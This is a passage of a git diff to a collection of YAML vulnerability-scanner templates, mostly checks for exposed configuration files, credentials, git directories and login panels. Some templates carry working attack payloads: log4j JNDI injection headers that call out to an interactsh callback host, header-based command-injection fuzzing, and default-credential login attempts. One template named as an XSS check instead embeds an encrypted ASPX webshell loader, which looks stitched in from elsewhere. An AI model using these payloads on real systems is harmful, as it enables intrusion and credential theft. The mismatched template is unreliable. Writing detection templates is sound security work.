4a0a004730450221009743a619b8ae5bbb216de2254c978a6aff3bceeb7cc54124697d3e8b2d7b5150022068d3fcc4ef1b0bcfb6c280cd87534daf8cce9751a796c0a344d8751af50b19a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/exposed/qihang-media-disclosure.yaml b/poc/exposed/qihang-media-disclosure.yaml index 1cdbe2c7a0..dcd65699ea 100644 --- a/poc/exposed/qihang-media-disclosure.yaml +++ b/poc/exposed/qihang-media-disclosure.yaml @@ -4,7 +4,8 @@ info: author: gy741 severity: critical description: The application suffers from clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5579.php tags: qihang,exposure requests: - method: GET diff --git a/poc/exposed/ruijie-information-disclosure-9932.yaml b/poc/exposed/ruijie-information-disclosure-9932.yaml index e7824e2a0b..a8d752d733 100644 --- a/poc/exposed/ruijie-information-disclosure-9932.yaml +++ b/poc/exposed/ruijie-information-disclosure-9932.yaml @@ -1,21 +1,37 @@ id: ruijie-information-disclosure + info: - name: Ruijie Information Disclosure + name: Ruijie Login Panel - Detect author: pikpikcu severity: high - reference: https://www.cnblogs.com/cHr1s/p/14499858.html + description: Ruijie login panel was detected and leaks authentication credentials. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 + reference: + - https://www.ruijienetworks.com/ + - https://www.cnblogs.com/cHr1s/p/14499858.html tags: ruijie,config,exposure -requests: + metadata: + max-request: 1 + +http: - method: GET path: - '{{BaseURL}}/login.php' + matchers-condition: and matchers: + - type: regex regex: - '"role":"super_admin","name":"(.*)","password":"(.*)"' part: body condition: and + - type: status status: - 200 + +# Enhanced by cs on 2023/03/02 diff --git a/poc/exposed/ruijie-information-disclosure.yaml b/poc/exposed/ruijie-information-disclosure.yaml index e7824e2a0b..8776f3ffb8 100644 --- a/poc/exposed/ruijie-information-disclosure.yaml +++ b/poc/exposed/ruijie-information-disclosure.yaml @@ -1,21 +1,26 @@ id: ruijie-information-disclosure + info: name: Ruijie Information Disclosure author: pikpikcu severity: high reference: https://www.cnblogs.com/cHr1s/p/14499858.html tags: ruijie,config,exposure + requests: - method: GET path: - '{{BaseURL}}/login.php' + matchers-condition: and matchers: + - type: regex regex: - '"role":"super_admin","name":"(.*)","password":"(.*)"' part: body condition: and + - type: status status: - 200 diff --git a/poc/exposed/sensitive-storage-exposure.yaml b/poc/exposed/sensitive-storage-exposure.yaml index 99e0b57b40..0b841cf60b 100644 --- a/poc/exposed/sensitive-storage-exposure.yaml +++ b/poc/exposed/sensitive-storage-exposure.yaml @@ -4,8 +4,7 @@ info: author: pussycat0x severity: medium description: Searches for sensitive keys file,logs,debugbar,app. - reference: - - https://www.exploit-db.com/ghdb/6304 + reference: https://www.exploit-db.com/ghdb/6304 tags: expose,listing,config,logs,storage requests: - method: GET diff --git a/poc/exposed/thumbs-db-disclosure-10763.yaml b/poc/exposed/thumbs-db-disclosure-10763.yaml index b5ee7b65d9..728de9d555 100644 --- a/poc/exposed/thumbs-db-disclosure-10763.yaml +++ b/poc/exposed/thumbs-db-disclosure-10763.yaml @@ -1,12 +1,11 @@ id: thumbs-db-disclosure - info: name: Thumbs DB Disclosure author: dhiyaneshDk severity: info - reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json + reference: + - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json tags: exposure,files - requests: - method: GET path: @@ -17,7 +16,6 @@ requests: binary: - 'D0CF11E0A1B11AE1' part: body - - type: status status: - 200 diff --git a/poc/exposed/tugboat-config-exposure-10842.yaml b/poc/exposed/tugboat-config-exposure-10842.yaml index 50793f616a..cd0e1af78a 100644 --- a/poc/exposed/tugboat-config-exposure-10842.yaml +++ b/poc/exposed/tugboat-config-exposure-10842.yaml @@ -1,5 +1,4 @@ id: tugboat-config-exposure - info: name: Tugboat configuration file exposure description: Tugboat is a command line tool for interacting with your DigitalOcean droplets. @@ -7,25 +6,21 @@ info: author: geeknik severity: critical tags: tugboat,config,exposure - requests: - method: GET path: - "{{BaseURL}}/.tugboat" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "authentication" - "access_token" - "ssh_user" condition: and - extractors: - type: regex part: body diff --git a/poc/exposed/wp-mailchimp-log-exposure-11492.yaml b/poc/exposed/wp-mailchimp-log-exposure-11492.yaml index 1869a7386f..42ab9af2c0 100644 --- a/poc/exposed/wp-mailchimp-log-exposure-11492.yaml +++ b/poc/exposed/wp-mailchimp-log-exposure-11492.yaml @@ -1,28 +1,23 @@ id: wp-mailchimp-log-exposure - info: name: WordPress Mailchimp 4 Debug Log Exposure author: aashiq severity: medium description: Searches for Mailchimp log exposure by attempting to query the debug log endpoint on wp-content - tags: logs,wordpress,exposure - + tags: logs,wordpress,exposure,mailchimp requests: - method: GET path: - "{{BaseURL}}/wp-content/uploads/mc4wp-debug.log" - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "WARNING: Form" - - type: word words: - 'text/plain' - part: header \ No newline at end of file + part: header diff --git a/poc/ftp/ftp-credentials-exposure.yaml b/poc/ftp/ftp-credentials-exposure.yaml index a0650c5bb3..2144e34389 100644 --- a/poc/ftp/ftp-credentials-exposure.yaml +++ b/poc/ftp/ftp-credentials-exposure.yaml @@ -1,13 +1,16 @@ id: ftp-credentials-exposure + info: name: FTP credentials exposure author: pikpikcu severity: medium tags: config,ftp,exposure + requests: - method: GET path: - "{{BaseURL}}/ftpsync.settings" + matchers-condition: and matchers: - type: word @@ -17,6 +20,7 @@ requests: - default_folder_permissions part: body condition: and + - type: status status: - - 200 + - 200 \ No newline at end of file diff --git a/poc/ftp/ftpconfig-7566.yaml b/poc/ftp/ftpconfig-7566.yaml index eb5cce7910..b3a3fde0bf 100644 --- a/poc/ftp/ftpconfig-7566.yaml +++ b/poc/ftp/ftpconfig-7566.yaml @@ -1,32 +1,27 @@ id: ftpconfig - info: - name: Atom remote-ssh ftpconfig Exposure - author: geeknik,DhiyaneshDK - severity: high + name: Atom remote-ssh ftpconfig + author: geeknik description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials - metadata: - verified: true - max-request: 1 - shodan-query: html:ftpconfig - tags: atom,ftp,config,exposure,files - -http: + severity: high + tags: atom,ftp,config +requests: - method: GET path: - "{{BaseURL}}/.ftpconfig" - matchers-condition: and matchers: - type: word + part: header words: - - '"protocol":' - - '"host":' - - '"user":' - - '"passphrase":' - condition: and - + - "text/plain" - type: status status: - 200 -# digest: 4a0a0047304502203e964492aa5ae873f03597ac2a5b426d215393200bd9a91a40eb7140836f033d022100d12b8356b48603f84427b50a84d0078581d289d3d7e9f95cf8310044a880bc29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + words: + - "protocol" + - "host" + - "port" + - "user" + condition: and diff --git a/poc/ftp/ftpconfig.yaml b/poc/ftp/ftpconfig.yaml index b3a3fde0bf..4be596f119 100644 --- a/poc/ftp/ftpconfig.yaml +++ b/poc/ftp/ftpconfig.yaml @@ -1,14 +1,17 @@ id: ftpconfig + info: name: Atom remote-ssh ftpconfig author: geeknik description: Created by remote-ssh for Atom, contains SFTP/SSH server details and credentials severity: high tags: atom,ftp,config + requests: - method: GET path: - "{{BaseURL}}/.ftpconfig" + matchers-condition: and matchers: - type: word diff --git a/poc/ftp/vsftpd-detection.yaml b/poc/ftp/vsftpd-detection.yaml index f4ecde4fab..934be20cb9 100644 --- a/poc/ftp/vsftpd-detection.yaml +++ b/poc/ftp/vsftpd-detection.yaml @@ -1,10 +1,18 @@ id: vsftpd-detection info: - name: VSFTPD v2.3.4 Backdoor Command Execution + name: VSFTPD 2.3.4 - Backdoor Command Execution author: pussycat0x severity: critical - tags: network,vsftpd,ftp - reference: https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability. + reference: + - https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: + cwe-id: CWE-78 + remediation: This backdoor was removed on July 3rd, 2011. + tags: network,vsftpd,ftp,backdoor network: - inputs: - data: "USER anonymous\r\nPASS pussycat0x\r\n" @@ -15,3 +23,5 @@ network: - type: word words: - "vsFTPd 2.3.4" + +# Enhanced by mp on 2022/05/23 diff --git a/poc/fuzz/xss-fuzz-11701.yaml b/poc/fuzz/xss-fuzz-11701.yaml index 3bed54cfe7..d4410a5f77 100644 --- a/poc/fuzz/xss-fuzz-11701.yaml +++ b/poc/fuzz/xss-fuzz-11701.yaml @@ -1,6 +1,5 @@ # id contains the unique identifier for the template. id: esetal-xss-fuzz - info: # Name is the name of the template name: Top 15 XSS Check @@ -10,7 +9,6 @@ info: # Description optionally describes the template. description: Searches for reflected XSS in the server response via GET-requests (but 9x slower xd). tags: xss - requests: - method: GET path: @@ -30,12 +28,10 @@ requests: words: - "<%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%> ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="action" - + upload ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="responderId" - + ResourceNewResponder ------WebKitFormBoundaryhbcZX7o0Hw19h3kr Content-Disposition: form-data; name="remotePath" - + /opt/resources ------WebKitFormBoundaryhbcZX7o0Hw19h3kr-- - matchers-condition: and matchers: - type: status @@ -43,4 +40,4 @@ requests: - "cmd.aspx" - "true" part: body - condition: and \ No newline at end of file + condition: and diff --git a/poc/git/git-config-7636.yaml b/poc/git/git-config-7636.yaml index 9f030f2ce7..e1f9a3e2d4 100644 --- a/poc/git/git-config-7636.yaml +++ b/poc/git/git-config-7636.yaml @@ -1,36 +1,14 @@ id: git-config - info: name: Git Config Disclosure - author: pdteam,pikpikcu,Mah3Sec_ + author: Ice3man severity: medium - description: Searches for the pattern /.git/config and log file on passed URLs. - tags: config,git,exposure - + description: Searches for the pattern /.git/config on passed URLs. requests: - - raw: - - | - GET /.git/config HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Content-Length: 1 - Connection: close - - matchers-condition: and + - method: GET + path: + - "{{BaseURL}}/.git/config" matchers: - type: word words: - "[core]" - - - type: dsl - dsl: - - "!contains(tolower(body), '' \ No newline at end of file + - '' + negative: true \ No newline at end of file diff --git a/poc/git/wordpress-git-config-11278.yaml b/poc/git/wordpress-git-config-11278.yaml index 2e71493a93..623ab5f4aa 100644 --- a/poc/git/wordpress-git-config-11278.yaml +++ b/poc/git/wordpress-git-config-11278.yaml @@ -5,13 +5,10 @@ info: author: nerrorsec severity: info description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: - - https://hackerone.com/reports/248693 - metadata: - max-request: 2 - tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme + reference: https://hackerone.com/reports/248693 + tags: config,git,exposure,wordpress,wp-plugin,wp-theme -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/.git/config" @@ -32,5 +29,3 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200c85e6bde7f8fd5a418f6ae475ea3e43619b2c9bbdaa025a2ff0a3467f271cc802204e6427102c1fe622a829ec9df5831e46740d60b9bf8eec9d72ecd086068a28de:922c64590222798bb761d5b6d8e72950 diff --git a/poc/google/Google-api.yaml b/poc/google/Google-api.yaml index b5b0737aa7..1242ce0367 100644 --- a/poc/google/Google-api.yaml +++ b/poc/google/Google-api.yaml @@ -1,12 +1,15 @@ id: google-api-key-file + info: name: Google API key author: gaurang severity: info tags: token,file,google + file: - extensions: - all + extractors: - type: regex regex: diff --git a/poc/google/google-api-key.yaml b/poc/google/google-api-key.yaml index 1798c569c3..d8a2a240cd 100644 --- a/poc/google/google-api-key.yaml +++ b/poc/google/google-api-key.yaml @@ -1,19 +1,24 @@ -id: google-api-key - -info: - name: Google API Key - author: Swissky - severity: info - tags: exposure,token,google - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/hopfully404" - - extractors: - - type: regex - part: body - regex: - - "AIza[0-9A-Za-z\\-_]{35}" +id: google-api-key + +info: + name: Google API Key + author: Swissky + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" + + extractors: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/poc/google/google-earth-dlogin-7780.yaml b/poc/google/google-earth-dlogin-7780.yaml index 6a574174aa..ae7bc0bc25 100644 --- a/poc/google/google-earth-dlogin-7780.yaml +++ b/poc/google/google-earth-dlogin-7780.yaml @@ -1,4 +1,5 @@ id: google-earth-dlogin + info: name: Google Earth Enterprise Default Login author: orpheus,johnjhacking @@ -20,23 +21,28 @@ info: metadata: shodan-query: title:"GEE Server" tags: default-login,google-earth + requests: - raw: - | GET /admin/ HTTP/1.1 Host: {{Hostname}} Authorization: Basic {{base64(username + ':' + password)}} + attack: pitchfork payloads: username: - geapacheuser + password: - geeadmin + matchers-condition: and matchers: - type: status status: - 200 + - type: word condition: and words: diff --git a/poc/google/metadata-google-8820.yaml b/poc/google/metadata-google-8820.yaml index 0e4bb0d91a..c930b428c4 100644 --- a/poc/google/metadata-google-8820.yaml +++ b/poc/google/metadata-google-8820.yaml @@ -1,8 +1,8 @@ id: metadata-service-gcp # This attack abuses a misconfigured proxy that allows access to the metadata # IP or a name which resolves to the IP. A standard proxy request is made to -# the proxy using the full metadata URL, which the proxy will fulfull to its -# own metadata sevice. +# the proxy using the full metadata URL, which the proxy will fulfill to its +# own metadata service. # # The proxy may also be vulnerable to host/port enumeration on localhost or # inside the private network. @@ -11,7 +11,7 @@ info: author: sullo severity: critical description: The Google cloud (GCP) host is configured as a proxy which allows access to the instance metadata service. This could allow significant access to the host/infrastructure. - remediation: Disable the proxy or restrict configuraiton to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. + remediation: Disable the proxy or restrict configuration to only allow access to approved hosts/ports. Upgrade to IMDSv2 if possible. reference: - https://cloud.google.com/compute/docs/metadata/default-metadata-values - https://blog.projectdiscovery.io/abusing-reverse-proxies-metadata/ @@ -23,11 +23,10 @@ info: cwe-id: CWE-441 requests: - raw: - - |+ + - | GET http://{{hostval}}/computeMetadata/v1/project/ HTTP/1.1 Host: {{hostval}} Metadata-Flavor: Google - payloads: hostval: - aws.interact.sh @@ -38,3 +37,4 @@ requests: part: body words: - "attributes/" +# Enhanced by cs on 2022/02/14 diff --git a/poc/graphql/graphql-array-batching-7827.yaml b/poc/graphql/graphql-array-batching-7827.yaml index 0297004ea8..d8731f71da 100644 --- a/poc/graphql/graphql-array-batching-7827.yaml +++ b/poc/graphql/graphql-array-batching-7827.yaml @@ -1,19 +1,23 @@ id: graphql-array-batching + info: name: GraphQL Array-based Batching author: Dolev Farhi - severity: low + severity: info description: | Some GraphQL engines support batching of multiple queries into a single request. This allows users to request multiple objects or multiple instances of objects efficiently. However, an attacker can leverage this feature to evade many security measures, including Rate Limit. + remediation: | + Deactivate or limit Batching in your GraphQL engine. reference: - https://stackoverflow.com/questions/62421352/graphql-difference-between-using-alias-versus-multiple-query-objects-when-doin - https://github.com/dolevf/Damn-Vulnerable-GraphQL-Application - https://graphql.security/ - remediation: | - Deactivate or limit Batching in your GraphQL engine. - tags: graphql -requests: + metadata: + max-request: 2 + tags: graphql,misconfig + +http: - raw: - | POST /graphql HTTP/1.1 @@ -21,6 +25,15 @@ requests: Content-Type: application/json [{"query":"query {\n __typename \n }"}, {"query":"mutation { \n __typename \n }"}] + - | + POST /api/graphql HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + [{"query":"query {\n __typename \n }"}, {"query":"mutation { \n __typename \n }"}] + + stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -30,7 +43,10 @@ requests: - ':"Mutations"' case-insensitive: true condition: and + - type: word part: header words: - "application/json" + +# digest: 4b0a004830460221009352f5fb69d50c384b0609e39864120c5da438c4d4b50e5f7ff9e78e6a17fdbc02210093902ef377f0eca11245c1fd3095f3b29f51a9417d1a48f3a7e1df0ecb0d0185:922c64590222798bb761d5b6d8e72950 diff --git a/poc/graphql/graphql-detect.yaml b/poc/graphql/graphql-detect.yaml index 1794593fe9..399e476c60 100644 --- a/poc/graphql/graphql-detect.yaml +++ b/poc/graphql/graphql-detect.yaml @@ -2,7 +2,7 @@ id: graphql-detect info: name: GraphQL API Detection - author: NkxxkN & ELSFA7110 + author: NkxxkN,ELSFA7110 severity: info requests: @@ -30,8 +30,6 @@ requests: - "{{BaseURL}}/graphql-devtools" - "{{BaseURL}}/graphql/v1" - "{{BaseURL}}/v1/graphql" - - "{{BaseURL}}/lol/graphql" - - "{{BaseURL}}/lol/graphql/v1" - "{{BaseURL}}/api/graphql/v1" - "{{BaseURL}}/portal-graphql" - "{{BaseURL}}/graphql-playground" diff --git a/poc/header/header-command-injection-7917.yaml b/poc/header/header-command-injection-7917.yaml index e9b07459aa..9cb3402bac 100644 --- a/poc/header/header-command-injection-7917.yaml +++ b/poc/header/header-command-injection-7917.yaml @@ -6,18 +6,17 @@ info: description: Fuzzing headers for command injection tags: fuzz,rce requests: - - payloads: - header: helpers/payloads/request-headers.txt - payload: helpers/payloads/command-injection.txt - raw: + - raw: - | - GET /?§header§ HTTP/1.1 + GET /?{{header}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - §header§: §payload§ - Connection: close + {{header}}: {{payload}} + payloads: + header: helpers/payloads/request-headers.txt + payload: helpers/payloads/command-injection.txt attack: clusterbomb redirects: true + stop-at-first-match: true matchers-condition: or matchers: - type: word @@ -28,4 +27,4 @@ requests: condition: and - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0:" diff --git a/poc/header/log4j-header.yaml b/poc/header/log4j-header.yaml index 7e1270f434..1d617fc7fd 100644 --- a/poc/header/log4j-header.yaml +++ b/poc/header/log4j-header.yaml @@ -1,23 +1,90 @@ id: log4j-fuzz-head-poc info: - name: log4j-rce漏洞 - author: xxx + name: "Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints" + description: | + Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features + used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other + JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary + code loaded from LDAP servers when message lookup substitution is enabled. + From log4j 2.15.0, this behavior has been disabled by default. + From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. + Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, + or other Apache Logging Services projects. + author: xxx,topscoder severity: critical - tags: apache,rce + reference: + - https://logging.apache.org/log4j/2.x/security.html + - http://www.openwall.com/lists/oss-security/2021/12/10/1 + - http://www.openwall.com/lists/oss-security/2021/12/10/2 + - http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html + - https://security.netapp.com/advisory/ntap-20211210-0007/ + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + - http://www.openwall.com/lists/oss-security/2021/12/10/3 + - https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032 + - https://www.oracle.com/security-alerts/alert-cve-2021-44228.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU57UJDCFIASIO35GC55JMKSRXJMCDFM/ + - http://www.openwall.com/lists/oss-security/2021/12/13/1 + - http://www.openwall.com/lists/oss-security/2021/12/13/2 + - https://twitter.com/kurtseifried/status/1469345530182455296 + - https://lists.debian.org/debian-lts-announce/2021/12/msg00007.html + - https://www.debian.org/security/2021/dsa-5020 + - https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf + - http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html + - http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html + - http://www.openwall.com/lists/oss-security/2021/12/14/4 + - https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html + - https://www.kb.cert.org/vuls/id/930724 + - http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html + - http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html + - http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html + - http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html + - http://www.openwall.com/lists/oss-security/2021/12/15/3 + - https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf + - https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/ + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd + - https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf + - http://packetstormsecurity.com/files/165371/VMware-Security-Advisory-2021-0028.4.html + - https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf + - http://packetstormsecurity.com/files/165532/Log4Shell-HTTP-Header-Injection.html + - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/M5CSVUNV4HWZZXGOKNSK6L7RPM7BOKIB/ + - https://github.com/cisagov/log4j-affected-db/blob/develop/SOFTWARE-LIST.md + - http://packetstormsecurity.com/files/165642/VMware-vCenter-Server-Unauthenticated-Log4Shell-JNDI-Injection-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/165673/UniFi-Network-Application-Unauthenticated-Log4Shell-Remote-Code-Execution.html + - https://www.oracle.com/security-alerts/cpujan2022.html + - https://github.com/cisagov/log4j-affected-db + - https://www.bentley.com/en/common-vulnerability-exposure/be-2022-0001 + - https://support.apple.com/kb/HT213189 + - http://seclists.org/fulldisclosure/2022/Mar/23 + - https://www.oracle.com/security-alerts/cpuapr2022.html + - https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-44228 + - https://www.nu11secur1ty.com/2021/12/cve-2021-44228.html + - http://seclists.org/fulldisclosure/2022/Jul/11 + - http://packetstormsecurity.com/files/167794/Open-Xchange-App-Suite-7.10.x-Cross-Site-Scripting-Command-Injection.html + - http://packetstormsecurity.com/files/167917/MobileIron-Log4Shell-Remote-Command-Execution.html + - http://seclists.org/fulldisclosure/2022/Dec/2 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10 + cve-id: CVE-2021-44228 + tags: apache,rce,log4j,critical,cve -requests: +http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} + - | POST / HTTP/1.1 Host: {{Hostname}} {{log4j_payloads}} payloads: log4j_payloads: + - 'X-Client-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-IP: ${jndi:ldap://{{interactsh-url}}/info}' - 'X-Remote-Addr: ${jndi:ldap://{{interactsh-url}}/info}' @@ -200,7 +267,7 @@ requests: - 'Contact: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Wap-Profile: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - 'X-Api-Version: ${${lower:jnd}${upper:i}: ${lower:ldap}://interactsh-url}' - + attack: clusterbomb matchers-condition: or matchers: @@ -215,3 +282,5 @@ requests: name: dns words: - "dns" + +# Enhanced by topscoder 31.march.2023 \ No newline at end of file diff --git a/poc/header/oob-header-based-interaction-9250.yaml b/poc/header/oob-header-based-interaction-9250.yaml index 4e336acfcd..aa2ef33783 100644 --- a/poc/header/oob-header-based-interaction-9250.yaml +++ b/poc/header/oob-header-based-interaction-9250.yaml @@ -4,7 +4,8 @@ info: author: pdteam severity: info description: The remote server fetched a spoofed URL from the request headers. - reference: https://github.com/PortSwigger/collaborator-everywhere + reference: + - https://github.com/PortSwigger/collaborator-everywhere tags: oast,ssrf,generic requests: - method: GET diff --git a/poc/header/sqliheader.yaml b/poc/header/sqliheader.yaml index 832a9fc156..012bac2af3 100644 --- a/poc/header/sqliheader.yaml +++ b/poc/header/sqliheader.yaml @@ -1,8 +1,10 @@ id: header-sqli + info: name: Request header based sqli - author: panch0r3d + author: nithissh severity: high + requests: - method: GET path: diff --git a/poc/http/detect-dns-over-https.yaml b/poc/http/detect-dns-over-https.yaml index 65d9a2bf23..8ac33de078 100644 --- a/poc/http/detect-dns-over-https.yaml +++ b/poc/http/detect-dns-over-https.yaml @@ -21,11 +21,13 @@ requests: - type: status status: - 200 + - type: word + part: header words: - "application/dns-message" - part: header + - type: regex + part: header regex: - "(C|c)ontent-(L|l)ength: 49" - part: header diff --git a/poc/http/lighttpd-default-8627.yaml b/poc/http/lighttpd-default-8627.yaml index 9038df8198..deeb3bf63f 100644 --- a/poc/http/lighttpd-default-8627.yaml +++ b/poc/http/lighttpd-default-8627.yaml @@ -1,19 +1,27 @@ id: lighttpd-default + info: name: lighttpd Default Page author: dhiyaneshDK severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Powered+by+lighttpd%22 - tags: tech -requests: + metadata: + max-request: 1 + shodan-query: http.title:"Powered by lighttpd" + tags: tech,lighttpd + +http: - method: GET path: - '{{BaseURL}}' + matchers-condition: and matchers: - type: word words: - "Powered by lighttpd" + - type: status status: - 200 + +# digest: 490a0046304402207bfb53ff74c8a5d2164ebdb801345b5d3b8f3888967a5ecdc711bd142f5f7bcd02203e2391d3e9dff05fd2ed8001470a60b1ac2fc4dfd7c61e2039b6cdd4263652fd:922c64590222798bb761d5b6d8e72950 diff --git a/poc/ibm/ibm-infoprint-lfi.yaml b/poc/ibm/ibm-infoprint-lfi.yaml index 899fad8ae8..c7df45d4c4 100644 --- a/poc/ibm/ibm-infoprint-lfi.yaml +++ b/poc/ibm/ibm-infoprint-lfi.yaml @@ -1,5 +1,4 @@ id: ibm-infoprint-lfi - info: name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal author: harshbothra_ @@ -8,7 +7,6 @@ info: reference: - https://www.exploit-db.com/exploits/47835 tags: ibm,lfi,matrix,printer - requests: - method: GET path: diff --git a/poc/ibm/ibm-mqseries-default-login-8107.yaml b/poc/ibm/ibm-mqseries-default-login-8107.yaml index 78424d3229..765cde99f4 100644 --- a/poc/ibm/ibm-mqseries-default-login-8107.yaml +++ b/poc/ibm/ibm-mqseries-default-login-8107.yaml @@ -1,44 +1,46 @@ -id: ibm-mqseries-default-login - -info: - name: IBM MQSeries web console default login - author: righettod - severity: high - description: The remote host is running IBM MQ and REST API and is using default credentials. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. - tags: ibm,default-login - reference: - - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd - - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL - -requests: - - raw: - - | - POST /ibmmq/console/j_security_check HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Referer: {{RootURL}}/ibmmq/console/login.html - - j_username={{username}}&j_password={{password}} - - attack: pitchfork - payloads: - username: - - admin - - app - - mqadmin - password: - - passw0rd - - passw0rd - - mqadmin - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "LtpaToken2_" - - - type: status - status: - - 302 \ No newline at end of file +id: ibm-mqseries-default-login +info: + name: IBM MQSeries Web Console Default Login + author: righettod + severity: high + description: IBM MQ and REST API default admin credentials were discovered. An unauthenticated, remote attacker can exploit this gain privileged or administrator access to the system. + tags: ibm,default-login + reference: + - https://github.com/ibm-messaging/mq-container/blob/master/etc/mqm/mq.htpasswd + - https://vulners.com/nessus/IBM_MQ_DEFAULT_CREDENTIALS.NASL + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /ibmmq/console/j_security_check HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/ibmmq/console/login.html + + j_username={{username}}&j_password={{password}} + attack: pitchfork + payloads: + username: + - admin + - app + - mqadmin + password: + - passw0rd + - passw0rd + - mqadmin + matchers-condition: and + matchers: + - type: word + part: header + words: + - "LtpaToken2_" + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/10 diff --git a/poc/ibm/ibm-note-login-8110.yaml b/poc/ibm/ibm-note-login-8110.yaml index 